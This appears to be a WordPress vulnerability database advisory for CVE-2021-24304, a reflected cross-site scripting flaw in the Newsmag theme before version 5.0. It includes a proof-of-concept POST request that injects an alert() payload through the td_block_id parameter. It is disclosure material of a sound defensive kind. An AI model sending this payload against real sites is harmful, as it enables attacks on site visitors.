Newsmag < 5.0 – Unauthenticated Reflected Cross-site Scripting (XSS) | CVE 2021-24304 | Theme Vulnerabilities

Description

The theme does not sanitise the td_block_id parameter in its td_ajax_block AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability.

Due to a nonce check, this issue is only exploitable on unauthenticated users (for as long as the nonce used in the request is valid)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Connection: close

action=td_ajax_block&td_block_id="><img+src+onerror=alert(document.domain)>&block_type=td_block_related_posts&td_magic_token=59c7ec0654

Affects Themes

Fixed in 5.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Truoc Phan

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

Verified

Yes

WPVDB ID

bb71f2f9-76bd-43f4-a8c9-35771dd28dff

Timeline

Publicly Published

2021-07-12 (about 4 years ago)

Added

2021-07-12 (about 4 years ago)

Last Updated

2022-02-06 (about 3 years ago)

Other

Published

Title

Published

2024-12-12

Title

3D Avatar User Profile <= 1.0.0 - Reflected Cross-Site Scripting

Published

2023-12-27

Title

Easy Video Player < 1.2.2.11 - Contributor+ Stored XSS

Published

2021-07-14

Title

Current Book <= 1.0.1 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2024-07-10

Title

Appmaker – Convert WooCommerce to Android & iOS Native Mobile Apps <= 1.36.12 - Reflected Cross-Site Scripting

Published

2021-10-29

Title

Download Monitor < 4.4.7 - Admin+ Stored Cross-Site Scripting